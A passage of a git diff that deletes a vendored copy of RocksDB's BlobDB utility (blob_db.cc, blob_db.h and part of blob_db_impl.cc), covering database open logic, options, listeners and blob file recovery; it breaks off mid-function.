-    return "BlobIndexCompactionFilterFactory";
-  }
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& /*context*/) override {
-    int64_t current_time = 0;
-    Status s = env_->GetCurrentTime(&current_time);
-    if (!s.ok()) {
-      return nullptr;
-    }
-    assert(current_time >= 0);
-    return std::unique_ptr<CompactionFilter>(
-        new BlobIndexCompactionFilter(static_cast<uint64_t>(current_time)));
-  }
-
- private:
-  Env* env_;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_db.cc b/thirdparty/rocksdb/utilities/blob_db/blob_db.cc
deleted file mode 100644
index b278df7..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_db.cc
+++ /dev/null
@@ -1,235 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "utilities/blob_db/blob_db.h"
-
-#include <inttypes.h>
-
-#include "db/write_batch_internal.h"
-#include "monitoring/instrumented_mutex.h"
-#include "options/cf_options.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/utilities/stackable_db.h"
-#include "table/block.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_builder.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "utilities/blob_db/blob_compaction_filter.h"
-#include "utilities/blob_db/blob_db_impl.h"
-
-namespace rocksdb {
-
-namespace blob_db {
-port::Mutex listener_mutex;
-typedef std::shared_ptr<BlobDBFlushBeginListener> FlushBeginListener_t;
-typedef std::shared_ptr<BlobReconcileWalFilter> ReconcileWalFilter_t;
-typedef std::shared_ptr<EvictAllVersionsCompactionListener>
-    CompactionListener_t;
-
-// to ensure the lifetime of the listeners
-std::vector<std::shared_ptr<EventListener>> all_blobdb_listeners;
-std::vector<ReconcileWalFilter_t> all_wal_filters;
-
-Status BlobDB::OpenAndLoad(const Options& options,
-                           const BlobDBOptions& bdb_options,
-                           const std::string& dbname, BlobDB** blob_db,
-                           Options* changed_options) {
-  if (options.compaction_filter != nullptr ||
-      options.compaction_filter_factory != nullptr) {
-    return Status::NotSupported("Blob DB doesn't support compaction filter.");
-  }
-
-  *changed_options = options;
-  *blob_db = nullptr;
-
-  FlushBeginListener_t fblistener =
-      std::make_shared<BlobDBFlushBeginListener>();
-  ReconcileWalFilter_t rw_filter = std::make_shared<BlobReconcileWalFilter>();
-  CompactionListener_t ce_listener =
-      std::make_shared<EvictAllVersionsCompactionListener>();
-
-  {
-    MutexLock l(&listener_mutex);
-    all_blobdb_listeners.push_back(fblistener);
-    if (bdb_options.enable_garbage_collection) {
-      all_blobdb_listeners.push_back(ce_listener);
-    }
-    all_wal_filters.push_back(rw_filter);
-  }
-
-  changed_options->compaction_filter_factory.reset(
-      new BlobIndexCompactionFilterFactory(options.env));
-  changed_options->listeners.emplace_back(fblistener);
-  if (bdb_options.enable_garbage_collection) {
-    changed_options->listeners.emplace_back(ce_listener);
-  }
-  changed_options->wal_filter = rw_filter.get();
-
-  DBOptions db_options(*changed_options);
-
-  // we need to open blob db first so that recovery can happen
-  BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, db_options);
-
-  fblistener->SetImplPtr(bdb);
-  if (bdb_options.enable_garbage_collection) {
-    ce_listener->SetImplPtr(bdb);
-  }
-  rw_filter->SetImplPtr(bdb);
-
-  Status s = bdb->OpenPhase1();
-  if (!s.ok()) return s;
-
-  *blob_db = bdb;
-  return s;
-}
-
-Status BlobDB::Open(const Options& options, const BlobDBOptions& bdb_options,
-                    const std::string& dbname, BlobDB** blob_db) {
-  *blob_db = nullptr;
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, cf_options));
-  std::vector<ColumnFamilyHandle*> handles;
-  Status s = BlobDB::Open(db_options, bdb_options, dbname, column_families,
-                          &handles, blob_db);
-  if (s.ok()) {
-    assert(handles.size() == 1);
-    // i can delete the handle since DBImpl is always holding a reference to
-    // default column family
-    delete handles[0];
-  }
-  return s;
-}
-
-Status BlobDB::Open(const DBOptions& db_options_input,
-                    const BlobDBOptions& bdb_options, const std::string& dbname,
-                    const std::vector<ColumnFamilyDescriptor>& column_families,
-                    std::vector<ColumnFamilyHandle*>* handles, BlobDB** blob_db,
-                    bool no_base_db) {
-  if (column_families.size() != 1 ||
-      column_families[0].name != kDefaultColumnFamilyName) {
-    return Status::NotSupported(
-        "Blob DB doesn't support non-default column family.");
-  }
-  *blob_db = nullptr;
-  Status s;
-
-  DBOptions db_options(db_options_input);
-  if (db_options.info_log == nullptr) {
-    s = CreateLoggerFromOptions(dbname, db_options, &db_options.info_log);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-
-  FlushBeginListener_t fblistener =
-      std::make_shared<BlobDBFlushBeginListener>();
-  CompactionListener_t ce_listener =
-      std::make_shared<EvictAllVersionsCompactionListener>();
-  ReconcileWalFilter_t rw_filter = std::make_shared<BlobReconcileWalFilter>();
-
-  db_options.listeners.emplace_back(fblistener);
-  if (bdb_options.enable_garbage_collection) {
-    db_options.listeners.emplace_back(ce_listener);
-  }
-  db_options.wal_filter = rw_filter.get();
-
-  {
-    MutexLock l(&listener_mutex);
-    all_blobdb_listeners.push_back(fblistener);
-    if (bdb_options.enable_garbage_collection) {
-      all_blobdb_listeners.push_back(ce_listener);
-    }
-    all_wal_filters.push_back(rw_filter);
-  }
-
-  ColumnFamilyOptions cf_options(column_families[0].options);
-  if (cf_options.compaction_filter != nullptr ||
-      cf_options.compaction_filter_factory != nullptr) {
-    return Status::NotSupported("Blob DB doesn't support compaction filter.");
-  }
-  cf_options.compaction_filter_factory.reset(
-      new BlobIndexCompactionFilterFactory(db_options.env));
-  ColumnFamilyDescriptor cf_descriptor(kDefaultColumnFamilyName, cf_options);
-
-  // we need to open blob db first so that recovery can happen
-  BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, db_options);
-  fblistener->SetImplPtr(bdb);
-  if (bdb_options.enable_garbage_collection) {
-    ce_listener->SetImplPtr(bdb);
-  }
-  rw_filter->SetImplPtr(bdb);
-
-  s = bdb->OpenPhase1();
-  if (!s.ok()) {
-    delete bdb;
-    return s;
-  }
-
-  if (no_base_db) {
-    *blob_db = bdb;
-    return s;
-  }
-
-  DB* db = nullptr;
-  s = DB::Open(db_options, dbname, {cf_descriptor}, handles, &db);
-  if (!s.ok()) {
-    delete bdb;
-    return s;
-  }
-
-  // set the implementation pointer
-  s = bdb->LinkToBaseDB(db);
-  if (!s.ok()) {
-    delete bdb;
-    bdb = nullptr;
-  }
-  *blob_db = bdb;
-  bdb_options.Dump(db_options.info_log.get());
-  return s;
-}
-
-BlobDB::BlobDB(DB* db) : StackableDB(db) {}
-
-void BlobDBOptions::Dump(Logger* log) const {
-  ROCKS_LOG_HEADER(log, "                 blob_db_options.blob_dir: %s",
-                   blob_dir.c_str());
-  ROCKS_LOG_HEADER(log, "            blob_db_options.path_relative: %d",
-                   path_relative);
-  ROCKS_LOG_HEADER(log, "                  blob_db_options.is_fifo: %d",
-                   is_fifo);
-  ROCKS_LOG_HEADER(log, "            blob_db_options.blob_dir_size: %" PRIu64,
-                   blob_dir_size);
-  ROCKS_LOG_HEADER(log, "           blob_db_options.ttl_range_secs: %" PRIu32,
-                   ttl_range_secs);
-  ROCKS_LOG_HEADER(log, "           blob_db_options.bytes_per_sync: %" PRIu64,
-                   bytes_per_sync);
-  ROCKS_LOG_HEADER(log, "           blob_db_options.blob_file_size: %" PRIu64,
-                   blob_file_size);
-  ROCKS_LOG_HEADER(log, "            blob_db_options.ttl_extractor: %p",
-                   ttl_extractor.get());
-  ROCKS_LOG_HEADER(log, "              blob_db_options.compression: %d",
-                   static_cast<int>(compression));
-  ROCKS_LOG_HEADER(log, "blob_db_options.enable_garbage_collection: %d",
-                   enable_garbage_collection);
-  ROCKS_LOG_HEADER(log, " blob_db_options.disable_background_tasks: %d",
-                   disable_background_tasks);
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_db.h b/thirdparty/rocksdb/utilities/blob_db/blob_db.h
deleted file mode 100644
index 3ade460..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_db.h
+++ /dev/null
@@ -1,263 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-#include <string>
-#include <vector>
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/stackable_db.h"
-
-namespace rocksdb {
-
-namespace blob_db {
-
-class TTLExtractor;
-
-// A wrapped database which puts values of KV pairs in a separate log
-// and store location to the log in the underlying DB.
-// It lacks lots of importatant functionalities, e.g. DB restarts,
-// garbage collection, iterators, etc.
-//
-// The factory needs to be moved to include/rocksdb/utilities to allow
-// users to use blob DB.
-
-struct BlobDBOptions {
-  // name of the directory under main db, where blobs will be stored.
-  // default is "blob_dir"
-  std::string blob_dir = "blob_dir";
-
-  // whether the blob_dir path is relative or absolute.
-  bool path_relative = true;
-
-  // is the eviction strategy fifo based
-  bool is_fifo = false;
-
-  // maximum size of the blob dir. Once this gets used, up
-  // evict the blob file which is oldest (is_fifo )
-  // 0 means no limits
-  uint64_t blob_dir_size = 0;
-
-  // a new bucket is opened, for ttl_range. So if ttl_range is 600seconds
-  // (10 minutes), and the first bucket starts at 1471542000
-  // then the blob buckets will be
-  // first bucket is 1471542000 - 1471542600
-  // second bucket is 1471542600 - 1471543200
-  // and so on
-  uint64_t ttl_range_secs = 3600;
-
-  // The smallest value to store in blob log. Value larger than this threshold
-  // will be inlined in base DB together with the key.
-  uint64_t min_blob_size = 0;
-
-  // at what bytes will the blob files be synced to blob log.
-  uint64_t bytes_per_sync = 0;
-
-  // the target size of each blob file. File will become immutable
-  // after it exceeds that size
-  uint64_t blob_file_size = 256 * 1024 * 1024;
-
-  // Instead of setting TTL explicitly by calling PutWithTTL or PutUntil,
-  // applications can set a TTLExtractor which can extract TTL from key-value
-  // pairs.
-  std::shared_ptr<TTLExtractor> ttl_extractor = nullptr;
-
-  // what compression to use for Blob's
-  CompressionType compression = kNoCompression;
-
-  // If enabled, blob DB periodically cleanup stale data by rewriting remaining
-  // live data in blob files to new files. If garbage collection is not enabled,
-  // blob files will be cleanup based on TTL.
-  bool enable_garbage_collection = false;
-
-  // Disable all background job. Used for test only.
-  bool disable_background_tasks = false;
-
-  void Dump(Logger* log) const;
-};
-
-class BlobDB : public StackableDB {
- public:
-  using rocksdb::StackableDB::Put;
-  virtual Status Put(const WriteOptions& options, const Slice& key,
-                     const Slice& value) override = 0;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) override {
-    if (column_family != DefaultColumnFamily()) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    return Put(options, key, value);
-  }
-
-  using rocksdb::StackableDB::Delete;
-  virtual Status Delete(const WriteOptions& options,
-                        const Slice& key) override = 0;
-  virtual Status Delete(const WriteOptions& options,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) override {
-    if (column_family != DefaultColumnFamily()) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    return Delete(options, key);
-  }
-
-  virtual Status PutWithTTL(const WriteOptions& options, const Slice& key,
-                            const Slice& value, uint64_t ttl) = 0;
-  virtual Status PutWithTTL(const WriteOptions& options,
-                            ColumnFamilyHandle* column_family, const Slice& key,
-                            const Slice& value, uint64_t ttl) {
-    if (column_family != DefaultColumnFamily()) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    return PutWithTTL(options, key, value, ttl);
-  }
-
-  // Put with expiration. Key with expiration time equal to
-  // std::numeric_limits<uint64_t>::max() means the key don't expire.
-  virtual Status PutUntil(const WriteOptions& options, const Slice& key,
-                          const Slice& value, uint64_t expiration) = 0;
-  virtual Status PutUntil(const WriteOptions& options,
-                          ColumnFamilyHandle* column_family, const Slice& key,
-                          const Slice& value, uint64_t expiration) {
-    if (column_family != DefaultColumnFamily()) {
-      return Status::NotSupported(
-          "Blob DB doesn't support non-default column family.");
-    }
-    return PutUntil(options, key, value, expiration);
-  }
-
-  using rocksdb::StackableDB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override = 0;
-
-  using rocksdb::StackableDB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override = 0;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_families,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override {
-    for (auto column_family : column_families) {
-      if (column_family != DefaultColumnFamily()) {
-        return std::vector<Status>(
-            column_families.size(),
-            Status::NotSupported(
-                "Blob DB doesn't support non-default column family."));
-      }
-    }
-    return MultiGet(options, keys, values);
-  }
-
-  using rocksdb::StackableDB::SingleDelete;
-  virtual Status SingleDelete(const WriteOptions& /*wopts*/,
-                              ColumnFamilyHandle* /*column_family*/,
-                              const Slice& /*key*/) override {
-    return Status::NotSupported("Not supported operation in blob db.");
-  }
-
-  using rocksdb::StackableDB::Merge;
-  virtual Status Merge(const WriteOptions& /*options*/,
-                       ColumnFamilyHandle* /*column_family*/,
-                       const Slice& /*key*/, const Slice& /*value*/) override {
-    return Status::NotSupported("Not supported operation in blob db.");
-  }
-
-  virtual Status Write(const WriteOptions& opts,
-                       WriteBatch* updates) override = 0;
-
-  using rocksdb::StackableDB::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions& options) override = 0;
-  virtual Iterator* NewIterator(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family) override {
-    if (column_family != DefaultColumnFamily()) {
-      // Blob DB doesn't support non-default column family.
-      return nullptr;
-    }
-    return NewIterator(options);
-  }
-
-  // Starting point for opening a Blob DB.
-  // changed_options - critical. Blob DB loads and inserts listeners
-  // into options which are necessary for recovery and atomicity
-  // Use this pattern if you need control on step 2, i.e. your
-  // BaseDB is not just a simple rocksdb but a stacked DB
-  // 1. ::OpenAndLoad
-  // 2. Open Base DB with the changed_options
-  // 3. ::LinkToBaseDB
-  static Status OpenAndLoad(const Options& options,
-                            const BlobDBOptions& bdb_options,
-                            const std::string& dbname, BlobDB** blob_db,
-                            Options* changed_options);
-
-  // This is another way to open BLOB DB which do not have other
-  // Stackable DB's in play
-  // Steps.
-  // 1. ::Open
-  static Status Open(const Options& options, const BlobDBOptions& bdb_options,
-                     const std::string& dbname, BlobDB** blob_db);
-
-  static Status Open(const DBOptions& db_options,
-                     const BlobDBOptions& bdb_options,
-                     const std::string& dbname,
-                     const std::vector<ColumnFamilyDescriptor>& column_families,
-                     std::vector<ColumnFamilyHandle*>* handles,
-                     BlobDB** blob_db, bool no_base_db = false);
-
-  virtual BlobDBOptions GetBlobDBOptions() const = 0;
-
-  virtual ~BlobDB() {}
-
-  virtual Status LinkToBaseDB(DB* db_base) = 0;
-
- protected:
-  explicit BlobDB(DB* db);
-};
-
-// Destroy the content of the database.
-Status DestroyBlobDB(const std::string& dbname, const Options& options,
-                     const BlobDBOptions& bdb_options);
-
-// TTLExtractor allow applications to extract TTL from key-value pairs.
-// This useful for applications using Put or WriteBatch to write keys and
-// don't intend to migrate to PutWithTTL or PutUntil.
-//
-// Applications can implement either ExtractTTL or ExtractExpiration. If both
-// are implemented, ExtractExpiration will take precedence.
-class TTLExtractor {
- public:
-  // Extract TTL from key-value pair.
-  // Return true if the key has TTL, false otherwise. If key has TTL,
-  // TTL is pass back through ttl. The method can optionally modify the value,
-  // pass the result back through new_value, and also set value_changed to true.
-  virtual bool ExtractTTL(const Slice& key, const Slice& value, uint64_t* ttl,
-                          std::string* new_value, bool* value_changed);
-
-  // Extract expiration time from key-value pair.
-  // Return true if the key has expiration time, false otherwise. If key has
-  // expiration time, it is pass back through expiration. The method can
-  // optionally modify the value, pass the result back through new_value,
-  // and also set value_changed to true.
-  virtual bool ExtractExpiration(const Slice& key, const Slice& value,
-                                 uint64_t now, uint64_t* expiration,
-                                 std::string* new_value, bool* value_changed);
-
-  virtual ~TTLExtractor() = default;
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_db_impl.cc b/thirdparty/rocksdb/utilities/blob_db/blob_db_impl.cc
deleted file mode 100644
index 23f173f..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_db_impl.cc
+++ /dev/null
@@ -1,2223 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "utilities/blob_db/blob_db_impl.h"
-#include <algorithm>
-#include <cinttypes>
-#include <iomanip>
-#include <limits>
-#include <memory>
-
-#include "db/db_impl.h"
-#include "db/write_batch_internal.h"
-#include "monitoring/instrumented_mutex.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/utilities/transaction.h"
-#include "table/block.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_builder.h"
-#include "table/meta_blocks.h"
-#include "util/cast_util.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-#include "util/sync_point.h"
-#include "util/timer_queue.h"
-#include "utilities/blob_db/blob_db_iterator.h"
-#include "utilities/blob_db/blob_index.h"
-
-namespace {
-int kBlockBasedTableVersionFormat = 2;
-}  // end namespace
-
-namespace rocksdb {
-namespace blob_db {
-
-Random blob_rgen(static_cast<uint32_t>(time(nullptr)));
-
-void BlobDBFlushBeginListener::OnFlushBegin(DB* db, const FlushJobInfo& info) {
-  if (impl_) impl_->OnFlushBeginHandler(db, info);
-}
-
-WalFilter::WalProcessingOption BlobReconcileWalFilter::LogRecordFound(
-    unsigned long long log_number, const std::string& log_file_name,
-    const WriteBatch& batch, WriteBatch* new_batch, bool* batch_changed) {
-  return WalFilter::WalProcessingOption::kContinueProcessing;
-}
-
-bool blobf_compare_ttl::operator()(const std::shared_ptr<BlobFile>& lhs,
-                                   const std::shared_ptr<BlobFile>& rhs) const {
-  if (lhs->expiration_range_.first < rhs->expiration_range_.first) {
-    return true;
-  }
-  if (lhs->expiration_range_.first > rhs->expiration_range_.first) {
-    return false;
-  }
-  return lhs->BlobFileNumber() < rhs->BlobFileNumber();
-}
-
-void EvictAllVersionsCompactionListener::InternalListener::OnCompaction(
-    int level, const Slice& key,
-    CompactionEventListener::CompactionListenerValueType value_type,
-    const Slice& existing_value, const SequenceNumber& sn, bool is_new) {
-  assert(impl_->bdb_options_.enable_garbage_collection);
-  if (!is_new &&
-      value_type ==
-          CompactionEventListener::CompactionListenerValueType::kValue) {
-    BlobIndex blob_index;
-    Status s = blob_index.DecodeFrom(existing_value);
-    if (s.ok()) {
-      if (impl_->debug_level_ >= 3)
-        ROCKS_LOG_INFO(
-            impl_->db_options_.info_log,
-            "CALLBACK COMPACTED OUT KEY: %s SN: %d "
-            "NEW: %d FN: %" PRIu64 " OFFSET: %" PRIu64 " SIZE: %" PRIu64,
-            key.ToString().c_str(), sn, is_new, blob_index.file_number(),
-            blob_index.offset(), blob_index.size());
-
-      impl_->override_vals_q_.enqueue({blob_index.file_number(), key.size(),
-                                       blob_index.offset(), blob_index.size(),
-                                       sn});
-    }
-  } else {
-    if (impl_->debug_level_ >= 3)
-      ROCKS_LOG_INFO(impl_->db_options_.info_log,
-                     "CALLBACK NEW KEY: %s SN: %d NEW: %d",
-                     key.ToString().c_str(), sn, is_new);
-  }
-}
-
-BlobDBImpl::BlobDBImpl(const std::string& dbname,
-                       const BlobDBOptions& blob_db_options,
-                       const DBOptions& db_options)
-    : BlobDB(nullptr),
-      db_impl_(nullptr),
-      env_(db_options.env),
-      ttl_extractor_(blob_db_options.ttl_extractor.get()),
-      bdb_options_(blob_db_options),
-      db_options_(db_options),
-      env_options_(db_options),
-      dir_change_(false),
-      next_file_number_(1),
-      epoch_of_(0),
-      shutdown_(false),
-      current_epoch_(0),
-      open_file_count_(0),
-      last_period_write_(0),
-      last_period_ampl_(0),
-      total_periods_write_(0),
-      total_periods_ampl_(0),
-      total_blob_space_(0),
-      open_p1_done_(false),
-      debug_level_(0),
-      oldest_file_evicted_(false) {
-  blob_dir_ = (bdb_options_.path_relative)
-                  ? dbname + "/" + bdb_options_.blob_dir
-                  : bdb_options_.blob_dir;
-}
-
-Status BlobDBImpl::LinkToBaseDB(DB* db) {
-  assert(db_ == nullptr);
-  assert(open_p1_done_);
-
-  db_ = db;
-
-  // the Base DB in-itself can be a stackable DB
-  db_impl_ = static_cast_with_check<DBImpl, DB>(db_->GetRootDB());
-
-  env_ = db_->GetEnv();
-
-  Status s = env_->CreateDirIfMissing(blob_dir_);
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(db_options_.info_log,
-                   "Failed to create blob directory: %s status: '%s'",
-                   blob_dir_.c_str(), s.ToString().c_str());
-  }
-  s = env_->NewDirectory(blob_dir_, &dir_ent_);
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(db_options_.info_log,
-                   "Failed to open blob directory: %s status: '%s'",
-                   blob_dir_.c_str(), s.ToString().c_str());
-  }
-
-  if (!bdb_options_.disable_background_tasks) {
-    StartBackgroundTasks();
-  }
-  return s;
-}
-
-BlobDBOptions BlobDBImpl::GetBlobDBOptions() const { return bdb_options_; }
-
-BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options)
-    : BlobDB(db),
-      db_impl_(static_cast_with_check<DBImpl, DB>(db)),
-      bdb_options_(blob_db_options),
-      db_options_(db->GetOptions()),
-      env_options_(db_->GetOptions()),
-      dir_change_(false),
-      next_file_number_(1),
-      epoch_of_(0),
-      shutdown_(false),
-      current_epoch_(0),
-      open_file_count_(0),
-      last_period_write_(0),
-      last_period_ampl_(0),
-      total_periods_write_(0),
-      total_periods_ampl_(0),
-      total_blob_space_(0),
-      oldest_file_evicted_(false) {
-  if (!bdb_options_.blob_dir.empty())
-    blob_dir_ = (bdb_options_.path_relative)
-                    ? db_->GetName() + "/" + bdb_options_.blob_dir
-                    : bdb_options_.blob_dir;
-}
-
-BlobDBImpl::~BlobDBImpl() {
-  // CancelAllBackgroundWork(db_, true);
-
-  Shutdown();
-}
-
-Status BlobDBImpl::OpenPhase1() {
-  assert(db_ == nullptr);
-  if (blob_dir_.empty())
-    return Status::NotSupported("No blob directory in options");
-
-  std::unique_ptr<Directory> dir_ent;
-  Status s = env_->NewDirectory(blob_dir_, &dir_ent);
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(db_options_.info_log,
-                   "Failed to open blob directory: %s status: '%s'",
-                   blob_dir_.c_str(), s.ToString().c_str());
-    open_p1_done_ = true;
-    return Status::OK();
-  }
-
-  s = OpenAllFiles();
-  open_p1_done_ = true;
-  return s;
-}
-
-void BlobDBImpl::StartBackgroundTasks() {
-  // store a call to a member function and object
-  tqueue_.add(
-      kReclaimOpenFilesPeriodMillisecs,
-      std::bind(&BlobDBImpl::ReclaimOpenFiles, this, std::placeholders::_1));
-  tqueue_.add(kGCCheckPeriodMillisecs,
-              std::bind(&BlobDBImpl::RunGC, this, std::placeholders::_1));
-  if (bdb_options_.enable_garbage_collection) {
-    tqueue_.add(
-        kDeleteCheckPeriodMillisecs,
-        std::bind(&BlobDBImpl::EvictDeletions, this, std::placeholders::_1));
-    tqueue_.add(
-        kDeleteCheckPeriodMillisecs,
-        std::bind(&BlobDBImpl::EvictCompacted, this, std::placeholders::_1));
-  }
-  tqueue_.add(
-      kDeleteObsoleteFilesPeriodMillisecs,
-      std::bind(&BlobDBImpl::DeleteObsoleteFiles, this, std::placeholders::_1));
-  tqueue_.add(kSanityCheckPeriodMillisecs,
-              std::bind(&BlobDBImpl::SanityCheck, this, std::placeholders::_1));
-  tqueue_.add(kWriteAmplificationStatsPeriodMillisecs,
-              std::bind(&BlobDBImpl::WaStats, this, std::placeholders::_1));
-  tqueue_.add(kFSyncFilesPeriodMillisecs,
-              std::bind(&BlobDBImpl::FsyncFiles, this, std::placeholders::_1));
-  tqueue_.add(
-      kCheckSeqFilesPeriodMillisecs,
-      std::bind(&BlobDBImpl::CheckSeqFiles, this, std::placeholders::_1));
-}
-
-void BlobDBImpl::Shutdown() { shutdown_.store(true); }
-
-void BlobDBImpl::OnFlushBeginHandler(DB* db, const FlushJobInfo& info) {
-  if (shutdown_.load()) return;
-
-  // a callback that happens too soon needs to be ignored
-  if (!db_) return;
-
-  FsyncFiles(false);
-}
-
-Status BlobDBImpl::GetAllLogFiles(
-    std::set<std::pair<uint64_t, std::string>>* file_nums) {
-  std::vector<std::string> all_files;
-  Status status = env_->GetChildren(blob_dir_, &all_files);
-  if (!status.ok()) {
-    return status;
-  }
-
-  for (const auto& f : all_files) {
-    uint64_t number;
-    FileType type;
-    bool psucc = ParseFileName(f, &number, &type);
-    if (psucc && type == kBlobFile) {
-      file_nums->insert(std::make_pair(number, f));
-    } else {
-      ROCKS_LOG_WARN(db_options_.info_log,
-                     "Skipping file in blob directory %s parse: %d type: %d",
-                     f.c_str(), psucc, ((psucc) ? type : -1));
-    }
-  }
-
-  return status;
-}
-
-Status BlobDBImpl::OpenAllFiles() {
-  WriteLock wl(&mutex_);
-
-  std::set<std::pair<uint64_t, std::string>> file_nums;
-  Status status = GetAllLogFiles(&file_nums);
-
-  if (!status.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to collect files from blob dir: %s status: '%s'",
-                    blob_dir_.c_str(), status.ToString().c_str());
-    return status;
-  }
-
-  ROCKS_LOG_INFO(db_options_.info_log,
-                 "BlobDir files path: %s count: %d min: %" PRIu64
-                 " max: %" PRIu64,
-                 blob_dir_.c_str(), static_cast<int>(file_nums.size()),
-                 (file_nums.empty()) ? -1 : (file_nums.begin())->first,
-                 (file_nums.empty()) ? -1 : (file_nums.end())->first);
-
-  if (!file_nums.empty())
-    next_file_number_.store((file_nums.rbegin())->first + 1);
-
-  for (auto f_iter : file_nums) {
-    std::string bfpath = BlobFileName(blob_dir_, f_iter.first);
-    uint64_t size_bytes;
-    Status s1 = env_->GetFileSize(bfpath, &size_bytes);
-    if (!s1.ok()) {
-      ROCKS_LOG_WARN(
-          db_options_.info_log,
-          "Unable to get size of %s. File skipped from open status: '%s'",
-          bfpath.c_str(), s1.ToString().c_str());
-      continue;
-    }
-
-    if (debug_level_ >= 1)
-      ROCKS_LOG_INFO(db_options_.info_log, "Blob File open: %s size: %" PRIu64,
-                     bfpath.c_str(), size_bytes);
-
-    std::shared_ptr<BlobFile> bfptr =
-        std::make_shared<BlobFile>(this, blob_dir_, f_iter.first);
-    bfptr->SetFileSize(size_bytes);
-
-    // since this file already existed, we will try to reconcile
-    // deleted count with LSM
-    bfptr->gc_once_after_open_ = true;
-
-    // read header
-    std::shared_ptr<Reader> reader;
-    reader = bfptr->OpenSequentialReader(env_, db_options_, env_options_);
-    s1 = reader->ReadHeader(&bfptr->header_);
-    if (!s1.ok()) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Failure to read header for blob-file %s "
-                      "status: '%s' size: %" PRIu64,
-                      bfpath.c_str(), s1.ToString().c_str(), size_bytes);
-      continue;
-    }
-    bfptr->SetHasTTL(bfptr->header_.has_ttl);
-    bfptr->SetCompression(bfptr->header_.compression);
-    bfptr->header_valid_ = true;
-
-    std::shared_ptr<RandomAccessFileReader> ra_reader =
-        GetOrOpenRandomAccessReader(bfptr, env_, env_options_);
-
-    BlobLogFooter bf;
-    s1 = bfptr->ReadFooter(&bf);
-
-    bfptr->CloseRandomAccessLocked();
-    if (s1.ok()) {
-      s1 = bfptr->SetFromFooterLocked(bf);
-      if (!s1.ok()) {
-        ROCKS_LOG_ERROR(db_options_.info_log,
-                        "Header Footer mismatch for blob-file %s "
-                        "status: '%s' size: %" PRIu64,
-                        bfpath.c_str(), s1.ToString().c_str(), size_bytes);
-        continue;
-      }
-    } else {
-      ROCKS_LOG_INFO(db_options_.info_log,
-                     "File found incomplete (w/o footer) %s", bfpath.c_str());
-
-      // sequentially iterate over the file and read all the records
-      ExpirationRange expiration_range(std::numeric_limits<uint32_t>::max(),
-                                       std::numeric_limits<uint32_t>::min());
-
-      uint64_t blob_count = 0;
-      BlobLogRecord record;
-      Reader::ReadLevel shallow = Reader::kReadHeaderKey;
-
-      uint64_t record_start = reader->GetNextByte();
-      // TODO(arahut) - when we detect corruption, we should truncate
-      while (reader->ReadRecord(&record, shallow).ok()) {
-        ++blob_count;
-        if (bfptr->HasTTL()) {
-          expiration_range.first =
